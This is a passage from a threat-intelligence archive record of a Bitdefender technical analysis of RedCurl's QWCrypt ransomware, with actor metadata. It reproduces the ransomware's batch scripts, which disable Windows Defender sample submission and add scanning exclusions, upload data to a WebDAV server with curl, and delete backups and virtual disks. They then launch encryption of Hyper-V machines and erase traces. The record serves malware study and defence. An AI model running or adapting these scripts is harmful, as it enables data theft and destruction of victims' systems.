files.\r\nExcluded Directories\r\nC:\\\\Windows\\\\\r\nC:\\\\Program Files\\\\Common Files\\\\\r\nC:\\\\Program Files\\\\Windows NT\\\\\r\nC:\\\\Program Files\\\\Windows Defender\r\nC:\\\\Program Files\\\\Malwarebytes\\\\\r\nC:\\\\Program Files\\\\VIPRE Business Agent\\\\\r\nC:\\\\Program 
Files\\\\WindowsApps\\\\\r\nC:\\\\Program Files\\\\Windows Media Player\\\\\r\nC:\\\\Program Files\\\\Update Services\\\\\r\nC:\\\\Program Files\\\\Microsoft\\.NET\\\\\r\nC:\\\\Program Files\\\\Internet Explorer\\\\\r\nC:\\\\Program Files\\\\Bitdefender\r\nC:\\\\Program Files\\\\WindowsPowerShell\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Common Files\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Internet Explorer\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Microsoft\\.NET\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Microsoft\\\\Edge\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Windows Media\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Windows NT\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\WindowsPowerShell\\\\\r\nC:\\\\ProgramData\\\\\r\n\\\\AppData\\\\Local\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Windows Defender\r\nCynet Ransom Protection\r\nC:\\\\Program Files \\(x86\\)\\\\Windows Media Player\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\SentinelOne\\\\\r\nC:\\\\Program Files\\\\SentinelOne\\\\\r\n\\\\AppData\\\\Roaming\\\\\r\nC:\\\\Windows\\.old\\\\\r\nSystem Volume Information\r\n:\\\\\\$\r\n\\\\Users\\\\\\$\r\n\\\\\\$\\w{32}\\\\\r\n\\\\afterSentDocuments\\\\\r\nExcluded Files\r\n.exe$\r\n.dll$\r\n.sys$\r\n.ocx$\r\n.dat$\r\n.lnk$\r\n.locked$\r\n.randombits$\r\nNTUSER.DAT\r\nDumpStack.log\r\nbootmgr$\r\n!!!how_to_unlock_randombits_files.txt$\r\nLauncher Script\r\nIF /I %~1 == --pass (set tpass=%2) ELSE GOTO stop\r\nIF /I %~3 == --main (set tmain=%4) ELSE GOTO stop\r\nIF /I %~5 == --key (set tkey=%6) ELSE GOTO stop\r\nset timeout=%8\r\ntimeout/T %timeout% if exist \"C:\\Program Files\\PowerShell\\7\\pwsh.exe\" (set pwsh=pwsh.exe) ELSE (set\r\npwsh=powershell.exe)\r\n%pwsh% -nop -c \"Set-MpPreference -MAPSReporting 0\"\r\n%pwsh% -nop -c \"Set-MpPreference -SubmitSamplesConsent NeverSend\"\r\n%pwsh% -nop -c \"Add-MpPreference -ExclusionPath C:\\ProgramData\\*\"\r\n%pwsh% -nop 
-c \"Add-MpPreference -ExclusionPath C:\\Windows\\system32\\*\"\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 17 of 21\n\n%pwsh% -nop -c \"Add-MpPreference -ExclusionPath C:\\ProgramData\"\r\n%pwsh% -nop -c \"Add-MpPreference -ExclusionPath C:\\Windows\\system32\"\r\nset wdir=%ALLUSERSPROFILE%\r\ncd %wdir%\r\nC:\\ProgramData\\7za.exe x -aoa -p%tpass% C:\\ProgramData\\%tmain%.tmp\r\nstart \"\" /D %wdir% cmd.exe /c %wdir%\\rnm.bat --pass %tpass% --main\r\n%tmain% --key %tkey%\r\n:stop\r\ndel %0\r\nMain Script\r\nIF /I %~1 == --pass (set tpass=%2) ELSE GOTO stop\r\nIF /I %~3 == --main (set tmain=%4) ELSE GOTO stop\r\nIF /I %~5 == --key (set tkey=%6) ELSE GOTO stop\r\nset slog=\u003credacted\u003e\r\nset spass=\u003credacted\u003e\r\nset ppass=\u003credacted\u003e\r\nset davstr=hxxps://mia[.]nl[.]tab[.]digital/remote[.]php/dav/files/\u003credacted\u003e\r\nset davfld=LOGS\r\nif exist \"C:\\Program Files\\PowerShell\\7\\pwsh.exe\" (set pwsh=pwsh.exe) ELSE (set pwsh=powershell.exe)\r\nset wdir=%ALLUSERSPROFILE%\r\nset tdir=temp_3a3352baf\r\ncd %wdir%\r\nmkdir %tdir%\r\nsc stop Term\r\nsc delete Term\r\ntasklist\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\nstart \"\" /D %wdir% cmd.exe /c %wdir%\\term.exe\r\ntimeout /T 20\r\nver \u003e nul\r\ntasklist /fi \"imagename eq term.exe\" | findstr /B /I /C:\"term.exe\" \u003eNUL\r\nIF ERRORLEVEL 1 (start cmd.exe /c %wdir%\\term.exe\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 18 of 21\n\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho RESTART_TERM\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 
2\u003e\u00261)\r\ntasklist\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\nwmic path win32_process get Caption,Processid,Commandline\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\nwmic logicaldisk get description,name,Size,FreeSpace\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\n::%pwsh% -nop -c \"$MCFP = New-Object -ComObject\r\nMSXML2.XMLHTTP;$MCFP.Open('PUT',$env:davstr+'/'+$env:davfld+'/RUN/'+$env:computername+'.tmp',\r\n$False, $env:slog, $env:spass);$MCFP.Send();\"\r\necho \u003e%wdir%\\a001.tmp\r\nC:\\ProgramData\\curl.exe -T %wdir%\\a001.tmp -u %slog%:%spass%\r\n%davstr%/%davfld%/RUN/%computername%.tmp\r\ndel /f /q %wdir%\\a001.tmp\r\n::DELETE\r\nif %computername%==\u003cHOSTNAME1\u003e (rd /S /Q \"G:\\backup\" rd /S /Q \"G:\\backup images\"\r\ndel /F /Q \"G:\\*.vhdx\"\r\nrd /S /Q \"J:\\Backup\"\r\nrd /S /Q \"J:\\Storage\")\r\nif %computername%==\u003cHOSTNAME2\u003e (del /F /Q \"D:\\\u003credacted\u003e\\Virtual Hard Disks\\disk1.vhdx\"\r\ndel /F /Q \"D:\\\u003credacted\u003e\\Virtual Hard Disks\\disk2.vhdx\"\r\ndel /F /Q \"D:\\\u003credacted\u003e\\\u003credacted\u003e\\Virtual Hard Disks\\*.*\"\r\ndel /F /Q \"D:\\\u003credacted\u003e\\old\\*.*\"\r\ndel /F /Q \"E:\\\u003credacted\u003e\\Virtual Hard Disks\\d_drive.vhdx\"\r\ndel /F /Q \"E:\\\u003credacted\u003e\\Virtual Hard Disks\\\u003credacted\u003e.vhdx\"\r\ndel /F /Q \"E:\\\u003credacted\u003e\\Virtual Hard Disks\\trans_log.vhdx\"\r\ndel /F /Q \"E:\\\u003cuser\u003e\\\u003credacted\u003e\\Virtual Hard Disks\\d_drive.vhdx\"\r\ndel /F /Q \"E:\\\u003cuser\u003e\\\u003credacted\u003e\\Virtual Hard Disks\\\u003credacted\u003e.vhdx\"\r\ndel /F /Q 
\"E:\\\u003cuser\u003e\\\u003credacted\u003e\\Virtual Hard Disks\\trans_log.vhdx\"\r\ndel /F /Q \"F:\\backup\\*.*\"\r\nrd /S /Q \"F:\\backup\\\")\r\n::DELETE\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 19 of 21\n\n::RBC\r\nC:\\ProgramData\\7za.exe x -aoa -p%tpass%\r\nC:\\ProgramData\\%tmain%2.tmp\r\nrbcw.exe --hv --excludeVM \"wingate\u003csubnet1\u003e,wingate,wingate\u003csubnet2\u003e\" --key %tkey% --nosd\r\n\u003e%tdir%\\%computername%_rbcw_hv_1.log 2\u003e\u00261\r\nrbcw.exe --hv --excludeVM \"wingate\u003csubnet1\u003e,wingate,wingate\u003csubnet2\u003e\" --key %tkey% --nosd\r\n\u003e%tdir%\\%computername%_rbcw_hv_2.log 2\u003e\u00261\r\ndel /f /q C:\\Windows\\Temp\\rnl.tmp\r\nC:\\ProgramData\\7za.exe a -p%ppass% -mhe=on -y C:\\Windows\\Temp\\rnl.tmp %tdir%\r\nC:\\ProgramData\\curl.exe -T C:\\Windows\\Temp\\rnl.tmp -u %slog%:%spass%\r\n%davstr%/%davfld%/RES/%computername%_01_%random%.tmp\r\nrbcw.exe --key %tkey% --nosd \u003e%tdir%\\%computername%_rbcw_1.log 2\u003e\u00261\r\nrbcw.exe --key %tkey% \u003e%tdir%\\%computername%_rbcw_2.log 2\u003e\u00261\r\n::RBC\r\ndel /f /q C:\\Windows\\Temp\\rnl.tmp\r\nC:\\ProgramData\\7za.exe a -p%ppass% -mhe=on -sdel -y\r\nC:\\Windows\\Temp\\rnl.tmp %tdir%\r\nC:\\ProgramData\\curl.exe -T C:\\Windows\\Temp\\rnl.tmp -u %slog%:%spass%\r\n%davstr%/%davfld%/RES/%computername%_02_%random%.tmp\r\nC:\\ProgramData\\7za.exe x -aoa -p%tpass% C:\\ProgramData\\%tmain%3.tmp\r\nstart cmd.exe /c %wdir%\\rnfin.bat\r\ntaskkill /IM term.exe /F\r\nsc stop Term\r\nsc delete Term\r\ndel /F /Q term.exe\r\ndel /F /Q term.sys\r\ndel /F /Q rbcw.exe\r\ndel /F /Q 7za.exe\r\ndel /F /Q curl.exe\r\n::del /F /Q C:\\Windows\\Temp\\rnl.tmp\r\ndel /F /Q %tmain%.tmp\r\ndel /F /Q %tmain%2.tmp\r\ndel /F /Q %tmain%3.tmp\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 20 of 21\n\nrd /S /Q %tdir%\r\n:stop\r\ndel %0\r\nSource: 
https://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive"
	],
	"report_names": [
		"redcurl-qwcrypt-ransomware-technical-deep-dive"
	],
	"threat_actors": [
		{
			"id": "6ec2cd63-307d-4281-86da-5dc199e932af",
			"created_at": "2025-08-07T02:03:24.821494Z",
			"updated_at": "2026-04-10T02:00:03.843522Z",
			"deleted_at": null,
			"main_name": "GOLD BLADE",
			"aliases": [
				"Earth Kapre ",
				"Red Wolf ",
				"RedCurl "
			],
			"source_name": "Secureworks:GOLD BLADE",
			"tools": [
				"RedLoader"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f72f2981-0dc4-4d96-857c-a725a143a538",
			"created_at": "2024-03-21T02:00:04.724563Z",
			"updated_at": "2026-04-10T02:00:03.602417Z",
			"deleted_at": null,
			"main_name": "Earth Kapre",
			"aliases": [
				"RedCurl",
				"Red Wolf",
				"GOLD BLADE"
			],
			"source_name": "MISPGALAXY:Earth Kapre",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "79e95381-8008-48dc-b981-fd66e1c46ca6",
			"created_at": "2022-10-25T16:07:24.110478Z",
			"updated_at": "2026-04-10T02:00:04.869039Z",
			"deleted_at": null,
			"main_name": "RedCurl",
			"aliases": [
				"Earth Kapre",
				"Red Wolf"
			],
			"source_name": "ETDA:RedCurl",
			"tools": [
				"Impacket",
				"LaZagne"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8108d548-e30f-4b90-aa60-71323ba66678",
			"created_at": "2024-11-01T02:00:52.667098Z",
			"updated_at": "2026-04-10T02:00:05.343786Z",
			"deleted_at": null,
			"main_name": "RedCurl",
			"aliases": [
				"RedCurl"
			],
			"source_name": "MITRE:RedCurl",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434201,
	"ts_updated_at": 1775826737,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e83136e0de330e727cf98f00e40c410e2138a9b9.pdf",
		"text": "https://archive.orkl.eu/e83136e0de330e727cf98f00e40c410e2138a9b9.txt",
		"img": "https://archive.orkl.eu/e83136e0de330e727cf98f00e40c410e2138a9b9.jpg"
	}
}